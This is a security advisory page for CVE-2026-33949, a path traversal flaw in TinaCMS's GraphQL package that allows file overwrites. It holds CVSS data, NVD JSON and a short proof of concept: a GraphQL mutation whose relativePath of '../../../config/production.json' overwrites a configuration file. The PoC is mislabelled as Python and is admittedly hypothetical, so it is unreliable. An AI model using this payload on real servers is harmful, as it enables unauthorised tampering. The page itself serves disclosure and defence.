Security Vulnerability Report
中文
CVE-2026-33949 CVSS 8.1 HIGH

CVE-2026-33949

Published: 2026-04-01 17:28:40
Last Modified: 2026-04-07 19:17:36
Source: [email protected]

Description

Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build script. This issue has been patched in version 2.2.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ssw:tinacms\/graphql:*:*:*:*:*:node.js:*:* - VULNERABLE
TinaCMS < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-33949: Path Traversal in TinaCMS GraphQL # This mutation attempts to overwrite a configuration file using path traversal mutation { # Hypothetical mutation based on the vulnerability description addOrUpdateDocument( relativePath: "../../../config/production.json" content: "{\"malicious\": \"payload\"}" ) { success document { id } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33949", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:39.507", "lastModified": "2026-04-07T19:17:35.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build script. This issue has been patched in version 2.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ssw:tinacms\\/graphql:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "2.2.1", "matchCriteriaId": "C7C5E716-5EA4-499D-B5C0-864632E2620D"}]}]}], "references": [{"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-v9p7-gf3q-h779", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.